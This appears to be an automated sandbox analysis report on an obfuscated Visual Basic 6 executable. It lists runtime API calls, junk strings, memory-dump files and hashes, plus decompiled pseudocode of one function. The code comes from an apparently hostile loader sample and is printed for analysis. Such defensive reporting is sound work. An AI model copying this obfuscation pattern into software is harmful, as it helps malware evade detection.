__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C95E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C973
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C97E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C993
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C9A2
#661.MSVBVM60(?,004024FC,?,?,?,?,?,?,?,00401546), ref: 0041C9C5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C9EC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041CA08
#705.MSVBVM60(00000002,00000000), ref: 0041CA38
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041CA42
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041CA4D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041CA59
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041CA65
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041CA6F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041CA7A
__vbaVarDup.MSVBVM60 ref: 0041CA9F
#560.MSVBVM60(?), ref: 0041CAAB
__vbaFreeVar.MSVBVM60(?), ref: 0041CAC8
#648.MSVBVM60(0000000A,?), ref: 0041CB08
__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041CB1F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041CB80
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CB8E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CB9B
__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041CBA1
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CBBD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CBCA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CBD0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CBF2
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CC0A
#648.MSVBVM60(0000000A), ref: 0041CC5A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041CC72
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041CCA9
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CCED
__vbaNew2.MSVBVM60(0040257C,004233C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CD12
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000014), ref: 0041CD77
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000070), ref: 0041CDD3
__vbaFreeObj.MSVBVM60(00000000,?,0040258C,00000070), ref: 0041CDF8
#519.MSVBVM60(tilskrersaksene,?), ref: 0041CE02
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041CE0F
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CE15
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CE22
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CE46
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CE86
#648.MSVBVM60(0000000A), ref: 0041CEA9
__vbaStrCopy.MSVBVM60 ref: 0041CEC9
__vbaFreeStr.MSVBVM60 ref: 0041CF2D
__vbaFreeVar.MSVBVM60 ref: 0041CF38
#527.MSVBVM60(Forretningsbrevet5), ref: 0041CF4C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041CF59
__vbaFreeStr.MSVBVM60 ref: 0041CF7A
__vbaStrCopy.MSVBVM60 ref: 0041CF8A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,000006F8), ref: 0041CFD2
__vbaStrMove.MSVBVM60(00000000,00401260,00402320,000006F8), ref: 0041D002
__vbaFreeStr.MSVBVM60(00000000,00401260,00402320,000006F8), ref: 0041D00D
#535.MSVBVM60(00000000,00401260,00402320,000006F8), ref: 0041D012
#564.MSVBVM60(00000004,?), ref: 0041D041
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041D05B
#685.MSVBVM60(00000004,?), ref: 0041D06F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041D07C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041D0C3
__vbaI4Var.MSVBVM60(?), ref: 0041D0F2
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,000006FC), ref: 0041D15E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402320,000006FC), ref: 0041D178
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041D18D
#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D19A
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D1A7
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D1AD
#648.MSVBVM60(0000000A), ref: 0041D1D4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041D1E6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000700), ref: 0041D25C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402320,00000700), ref: 0041D276
__vbaFreeVar.MSVBVM60(00000000,00401260,00402320,00000700), ref: 0041D281
#648.MSVBVM60(0000000A), ref: 0041D2A1
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000704), ref: 0041D2F7
__vbaFreeVar.MSVBVM60(00000000,00401260,00402320,00000704), ref: 0041D311
#648.MSVBVM60(0000000A), ref: 0041D331
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041D363
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041D383
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D3B3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D3CD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D400
__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D419
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041D48A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D497
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D4A7
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D4B4
__vbaFpI4.MSVBVM60 ref: 0041D4D2
__vbaStrCopy.MSVBVM60 ref: 0041D4E8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041D505
__vbaStrMove.MSVBVM60 ref: 0041D546
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D562
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D56F
#574.MSVBVM60(00000003), ref: 0041D596
__vbaStrMove.MSVBVM60(00000003), ref: 0041D5A3
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041D5AE
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D5EB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000708), ref: 0041D628
__vbaFreeStr.MSVBVM60(00000000,00401260,00402320,00000708), ref: 0041D642
__vbaFreeVar.MSVBVM60(00000000,00401260,00402320,00000708), ref: 0041D64D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D657
__vbaStrCopy.MSVBVM60 ref: 0041D6D6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,0000070C), ref: 0041D734
__vbaFreeStr.MSVBVM60(00000000,00401260,00402320,0000070C), ref: 0041D74E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000710), ref: 0041D7AF
__vbaVarDup.MSVBVM60(00000000,00401260,00402320,00000710), ref: 0041D7E3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D7F8
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D804
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D811
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D821
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D857
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D897
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D8AF
#705.MSVBVM60(00000002,00000000), ref: 0041D8D4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D8E1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D8E7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000714), ref: 0041D922
__vbaFreeStr.MSVBVM60(00000000,00401260,00402320,00000714), ref: 0041D93C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402320,00000714), ref: 0041D947
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D951
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000718), ref: 0041D9A4
#525.MSVBVM60(00000067), ref: 0041D9C3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D9D0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D9DC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D9E9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041DA0D
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041DA30
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041DA5E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,0000071C), ref: 0041DA9B
__vbaStrMove.MSVBVM60(00000000,00401260,00402320,0000071C), ref: 0041DACB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041DAF5
#564.MSVBVM60(00000005,?), ref: 0041DB2D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041DB47
#541.MSVBVM60(?,16:16:16), ref: 0041DB67
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041DB7A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DB80
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DB8D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041DBAD
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DBF9
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DC06
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402320,00000720), ref: 0041DC3C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041DC72
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041DC98
#696.MSVBVM60(00402900), ref: 0041DCA5
#696.MSVBVM60(00402948,00402900), ref: 0041DCB6
__vbaStrCopy.MSVBVM60(00402948,00402900), ref: 0041DCCD
__vbaFreeStr.MSVBVM60 ref: 0041DD13
__vbaVarMove.MSVBVM60 ref: 0041DD3A
__vbaVarMove.MSVBVM60 ref: 0041DD5C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041DD70
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041DD76
__vbaFreeVar.MSVBVM60(0041DE68), ref: 0041DE10
__vbaFreeStr.MSVBVM60(0041DE68), ref: 0041DE18
__vbaAryDestruct.MSVBVM60(00000000,?,0041DE68), ref: 0041DE2F
__vbaFreeStr.MSVBVM60(00000000,?,0041DE68), ref: 0041DE37
__vbaFreeStr.MSVBVM60(00000000,?,0041DE68), ref: 0041DE3F
__vbaFreeStr.MSVBVM60(00000000,?,0041DE68), ref: 0041DE47
__vbaFreeStr.MSVBVM60(00000000,?,0041DE68), ref: 0041DE4F
__vbaFreeVar.MSVBVM60(00000000,?,0041DE68), ref: 0041DE57
__vbaFreeStr.MSVBVM60(00000000,?,0041DE68), ref: 0041DE62

Strings

replicr, xrefs: 0041CA7F
Snoreskrternes8, xrefs: 0041D42B
Indvi2, xrefs: 0041DA41
tilskrersaksene, xrefs: 0041CDFD
Utrecht8, xrefs: 0041D77A
Lersernes, xrefs: 0041D2BB
tril, xrefs: 0041D41F
Admiraliteternes1, xrefs: 0041CEBE
undrede, xrefs: 0041D6FA
DUMBFISH, xrefs: 0041DA25
Forretningsbrevet5, xrefs: 0041CF47
16:16:16, xrefs: 0041DB5B
Hjortens, xrefs: 0041C831
7:7:7, xrefs: 0041C8E6
STRUTTENDE, xrefs: 0041D9D7
eudaemonistical, xrefs: 0041D492
CANNIBALEAN, xrefs: 0041C964
Dagvagten, xrefs: 0041CCE8
blaarv, xrefs: 0041D220
Vidnefast, xrefs: 0041CF7F
SOLITRSKAKKEN, xrefs: 0041DA46
SELVFINANSIEREDES, xrefs: 0041DCF4
Benefact6, xrefs: 0041D4F4
Generalisations7, xrefs: 0041D94C
=9, xrefs: 0041D6B9
RODTEGNENES, xrefs: 0041D4A2
centralregeringens, xrefs: 0041D6CB
Kainsmrkernes3, xrefs: 0041D652
Odontoma7, xrefs: 0041D6FF
Fdres, xrefs: 0041DA3C
multivalent, xrefs: 0041C96E
Whiskysourens1, xrefs: 0041D5E6
OFFENTLIGHEDSSFRE, xrefs: 0041CCA4
ADMIRINGLY, xrefs: 0041D56A
Bursati, xrefs: 0041C969
Readjust, xrefs: 0041C918
Udstillingslokalet, xrefs: 0041D852
ASCRY, xrefs: 0041D816
Skovteknikeren6, xrefs: 0041DCC2
Paucify9, xrefs: 0041D4DD

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: 524483d20fc34302098eaa8fba5b3a619fd4e0f57682060691ad90eef6af03ed
Instruction ID: 253314dde4ea415faec590ae0acc60b30c3cb878649fa53aa0442ca1adc60744
Opcode Fuzzy Hash: 524483d20fc34302098eaa8fba5b3a619fd4e0f57682060691ad90eef6af03ed
Instruction Fuzzy Hash: 53D20875900228ABDB21EF61CD85FDDB7B8AF08304F5080EAE509BB1A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004200C0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E004200C0(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				short* _v52;
				char _v64;
				short _v72;
				void* _v76;
				char _v80;
				void* _v84;
				intOrPtr _v92;
				char _v100;
				char _v116;
				intOrPtr _v124;
				char _v132;
				short _v140;
				char _v148;
				char _v164;
				intOrPtr _v172;
				char _v180;
				char* _v204;
				intOrPtr _v212;
				void* _v232;
				char _v236;
				short _v240;
				signed int _v244;
				intOrPtr* _v248;
				signed int _v252;
				intOrPtr* _v264;
				signed int _v268;
				signed int _v272;
				signed int _t182;
				short _t184;
				char* _t191;
				short _t193;
				char* _t201;
				short _t204;
				short _t208;
				char* _t210;
				short _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				short _t222;
				signed int _t223;
				signed int _t225;
				signed int _t227;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t235;
				short _t237;
				signed int _t238;
				signed int _t240;
				short _t242;
				signed int _t243;
				char* _t245;
				char* _t250;
				signed int _t259;
				signed int _t264;
				signed int _t278;
				signed int _t287;
				signed int _t296;
				signed int _t300;
				signed int _t305;
				void* _t334;
				void* _t336;
				intOrPtr _t337;
				void* _t338;

				_t337 = _t336 - 0xc;
				 *[fs:0x0] = _t337;
				L00401540();
				_v16 = _t337;
				_v12 = 0x4013d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t334);
				L004017B6();
				_push(2);
				_push(0x4025a0);
				_t182 =  &_v64;
				_push(_t182);
				L0040186A();
				if((_t182 | 0xffffffff) != 0) {
					_v92 = 0x80020004;
					_v100 = 0xa;
					_push( &_v100);
					L00401648();
					_v36 = __fp0;
					L00401828();
					_push(0xd4);
					L00401786();
					L0040183A();
				}
				_v124 = 0x80020004;
				_v132 = 0xa;
				_t184 =  &_v132;
				_push(_t184);
				L004017F2();
				_v140 = _t184;
				_v148 = 2;
				_push( &_v148);
				_push( &_v164);
				L004016C0();
				_push(L"Rappees");
				_push(L"Jiggerens");
				_push( &_v100); // executed
				L00401732(); // executed
				_push( &_v100);
				_push( &_v116);
				L00401852();
				_push(0x52);
				_push( &_v164);
				_t191 =  &_v80;
				_push(_t191);
				L00401858();
				_push(_t191);
				L0040162A();
				_v172 = _t191;
				_v180 = 0x8008;
				_push( &_v116);
				_t193 =  &_v180;
				_push(_t193);
				L00401738();
				_v240 = _t193;
				L00401846();
				_push( &_v180);
				_push( &_v116);
				_push( &_v164);
				_push( &_v148);
				_push( &_v132);
				_push( &_v100);
				_push(6);
				L00401840();
				_t338 = _t337 + 0x1c;
				if(_v240 != 0) {
					_v204 = L"PREHISTORICS";
					_v212 = 8;
					L0040184C();
					_push(0xa2);
					_push( &_v100);
					_push( &_v116);
					L00401624();
					_v124 = 0x8d;
					_v132 = 2;
					_push( &_v132);
					_push(0x75);
					_push( &_v116);
					_t250 =  &_v80;
					_push(_t250);
					L00401858();
					_push(_t250);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v132);
					_push( &_v116);
					_push( &_v100);
					_push(3);
					L00401840();
					_t338 = _t338 + 0x10;
					if( *0x4233c0 != 0) {
						_v264 = 0x4233c0;
					} else {
						_push(0x4233c0);
						_push(0x40257c);
						L004017CE();
						_v264 = 0x4233c0;
					}
					_v240 =  *_v264;
					_t259 =  *((intOrPtr*)( *_v240 + 0x14))(_v240,  &_v84);
					asm("fclex");
					_v244 = _t259;
					if(_v244 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40256c);
						_push(_v240);
						_push(_v244);
						L004017C8();
						_v268 = _t259;
					}
					_v248 = _v84;
					_t264 =  *((intOrPtr*)( *_v248 + 0xc0))(_v248,  &_v232);
					asm("fclex");
					_v252 = _t264;
					if(_v252 >= 0) {
						_v272 = _v272 & 0x00000000;
					} else {
						_push(0xc0);
						_push(0x40258c);
						_push(_v248);
						_push(_v252);
						L004017C8();
						_v272 = _t264;
					}
					_v72 = _v232;
					L004017C2();
				}
				_v92 = 0x3a;
				_v100 = 2;
				_t201 =  &_v100;
				_push(_t201);
				_push(8);
				_push(L"UNINTERMITTEDLY");
				L004016A2();
				_v124 = _t201;
				_v132 = 0x8008;
				_push( &_v116);
				L004017FE();
				_push( &_v132);
				_t204 =  &_v116;
				_push(_t204);
				L00401738();
				_v240 = _t204;
				_push( &_v116);
				_push( &_v132);
				_push( &_v100);
				_push(3);
				L00401840();
				_t208 = _v240;
				if(_t208 != 0) {
					_push(0xb1);
					L00401756();
					L0040183A();
					_push(_t208);
					L004017EC();
					 *_v52 = _t208;
					L00401846();
					_push(L"MINESTRYGNING");
					L004017EC();
					 *((short*)(_v52 + 2)) = _t208;
					_push(L"2:2:2");
					_push( &_v100);
					L0040182E();
					_push( &_v100);
					_t213 =  &_v80;
					_push(_t213);
					L00401858();
					_push(_t213);
					L004017EC();
					_t278 = 2;
					 *((short*)(_v52 + (_t278 << 1))) = _t213;
					L00401846();
					L00401828();
					_t214 = 2;
					 *((short*)(_v52 + _t214 * 3)) = 0x4cf8;
					_t216 = 2;
					 *((short*)(_v52 + (_t216 << 2))) = 0xe04;
					_t218 = 2;
					 *((short*)(_v52 + _t218 * 5)) = 0x1773;
					_t220 = 2;
					 *((short*)(_v52 + _t220 * 6)) = 0x56a4;
					_v92 = 0x42458a;
					_v100 = 3;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_t222 =  &_v100;
					_push(_t222);
					L0040161E();
					L0040183A();
					_push(_t222);
					L004017EC();
					_t287 = 2;
					 *((short*)(_v52 + _t287 * 7)) = _t222;
					L00401846();
					L00401828();
					_t223 = 2;
					 *((short*)(_v52 + (_t223 << 3))) = 0x196e;
					_t225 = 2;
					 *((short*)(_v52 + _t225 * 9)) = 0x15b6;
					_t227 = 2;
					 *((short*)(_v52 + _t227 * 0xa)) = 0x1a5;
					_t229 = 2;
					 *((short*)(_v52 + _t229 * 0xb)) = 0x3c4c;
					_t231 = 2;
					_t232 = _t231 * 0xc;
					 *((short*)(_v52 + _t232)) = 0x3974;
					_push(L"Suppositoriets");
					L004017EC();
					_t296 = 2;
					 *(_v52 + _t296 * 0xd) = _t232;
					_t233 = 2;
					 *((short*)(_v52 + _t233 * 0xe)) = 0x5ff7;
					_t235 = 2;
					 *((short*)(_v52 + _t235 * 0xf)) = 0x758c;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t237 =  &_v100;
					_push(_t237);
					L004017F2();
					_t300 = 2;
					 *((short*)(_v52 + (_t300 << 4))) = _t237;
					L00401828();
					_t238 = 2;
					 *((short*)(_v52 + _t238 * 0x11)) = 0xef8;
					_t240 = 2;
					 *((short*)(_v52 + _t240 * 0x12)) = 0x12b7;
					_v92 = 0x80020004;
					_v100 = 0xa;
					_t242 =  &_v100;
					_push(_t242);
					L004017F2();
					_t305 = 2;
					 *((short*)(_v52 + _t305 * 0x13)) = _t242;
					L00401828();
					_t243 = 2;
					 *((short*)(_v52 + _t243 * 0x14)) = 0x3e84;
					_v92 = 0x57f4;
					_v100 = 2;
					_push(L"BESMUDSES");
					_t245 =  &_v100;
					_push(_t245);
					L00401618();
					L0040183A();
					_push(_t245);
					L00401696();
					L0040183A();
					L00401846();
					L00401828();
				}
				asm("wait");
				_push(0x4206ea);
				L00401846();
				L00401846();
				L00401846();
				_v236 =  &_v64;
				_t210 =  &_v236;
				_push(_t210);
				_push(0);
				L0040173E();
				L00401846();
				return _t210;
			}

0x004200c3
0x004200d2
0x004200de
0x004200e6
0x004200e9
0x004200f0
0x004200ff
0x00420108
0x0042010d
0x0042010f
0x00420114
0x00420117
0x00420118
0x00420122
0x00420124
0x0042012b
0x00420135
0x00420136
0x0042013b
0x00420141
0x00420146
0x0042014b
0x00420155
0x00420155
0x0042015a
0x00420161
0x00420168
0x0042016b
0x0042016c
0x00420171
0x00420178
0x00420188
0x0042018f
0x00420190
0x00420195
0x0042019a
0x004201a2
0x004201a3
0x004201ab
0x004201af
0x004201b0
0x004201b5
0x004201bd
0x004201be
0x004201c1
0x004201c2
0x004201c7
0x004201c8
0x004201cd
0x004201d3
0x004201e0
0x004201e1
0x004201e7
0x004201e8
0x004201ed
0x004201f7
0x00420202
0x00420206
0x0042020d
0x00420214
0x00420218
0x0042021c
0x0042021d
0x0042021f
0x00420224
0x00420230
0x00420236
0x00420240
0x00420253
0x00420258
0x00420260
0x00420264
0x00420265
0x0042026a
0x00420271
0x0042027b
0x0042027c
0x00420281
0x00420282
0x00420285
0x00420286
0x0042028b
0x0042028c
0x00420296
0x0042029e
0x004202a6
0x004202aa
0x004202ae
0x004202af
0x004202b1
0x004202b6
0x004202c0
0x004202dd
0x004202c2
0x004202c2
0x004202c7
0x004202cc
0x004202d1
0x004202d1
0x004202ef
0x00420307
0x0042030a
0x0042030c
0x00420319
0x0042033b
0x0042031b
0x0042031b
0x0042031d
0x00420322
0x00420328
0x0042032e
0x00420333
0x00420333
0x00420345
0x00420360
0x00420366
0x00420368
0x00420375
0x0042039a
0x00420377
0x00420377
0x0042037c
0x00420381
0x00420387
0x0042038d
0x00420392
0x00420392
0x004203a8
0x004203af
0x004203af
0x004203b4
0x004203bb
0x004203c2
0x004203c5
0x004203c6
0x004203c8
0x004203cd
0x004203d2
0x004203d5
0x004203df
0x004203e0
0x004203e8
0x004203e9
0x004203ec
0x004203ed
0x004203f2
0x004203fc
0x00420400
0x00420404
0x00420405
0x00420407
0x0042040f
0x00420418
0x0042041e
0x00420423
0x0042042d
0x00420432
0x00420433
0x0042043b
0x00420441
0x00420446
0x0042044b
0x00420453
0x00420457
0x0042045f
0x00420460
0x00420468
0x00420469
0x0042046c
0x0042046d
0x00420472
0x00420473
0x0042047a
0x00420480
0x00420487
0x0042048f
0x00420496
0x0042049d
0x004204a5
0x004204ac
0x004204b4
0x004204bb
0x004204c3
0x004204ca
0x004204d0
0x004204d7
0x004204de
0x004204e0
0x004204e2
0x004204e4
0x004204e6
0x004204e9
0x004204ea
0x004204f4
0x004204f9
0x004204fa
0x00420501
0x00420508
0x0042050f
0x00420517
0x0042051e
0x00420525
0x0042052d
0x00420534
0x0042053c
0x00420543
0x0042054b
0x00420552
0x0042055a
0x0042055b
0x00420561
0x00420567
0x0042056c
0x00420573
0x0042057a
0x00420580
0x00420587
0x0042058f
0x00420596
0x0042059c
0x004205a3
0x004205aa
0x004205ad
0x004205ae
0x004205b5
0x004205bc
0x004205c3
0x004205ca
0x004205d1
0x004205d9
0x004205e0
0x004205e6
0x004205ed
0x004205f4
0x004205f7
0x004205f8
0x004205ff
0x00420606
0x0042060d
0x00420614
0x0042061b
0x00420621
0x00420628
0x0042062f
0x00420634
0x00420637
0x00420638
0x00420642
0x00420647
0x00420648
0x00420652
0x0042065a
0x00420662
0x00420662
0x00420667
0x00420668
0x004206b5
0x004206bd
0x004206c5
0x004206cd
0x004206d3
0x004206d9
0x004206da
0x004206dc
0x004206e4
0x004206e9

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 004200DE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420108
__vbaAryConstruct2.MSVBVM60(?,004025A0,00000002,?,?,?,?,00401546), ref: 00420118
#593.MSVBVM60(0000000A), ref: 00420136
__vbaFreeVar.MSVBVM60(0000000A), ref: 00420141
#537.MSVBVM60(000000D4,0000000A), ref: 0042014B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 00420155
#648.MSVBVM60(0000000A), ref: 0042016C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 00420190
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004201A3
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004201B0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004201C2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004201C8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004201E8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004201F7
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0042021F
__vbaVarDup.MSVBVM60 ref: 00420253
#513.MSVBVM60(?,?,000000A2), ref: 00420265
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 00420286
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042028C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 00420296
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042029E
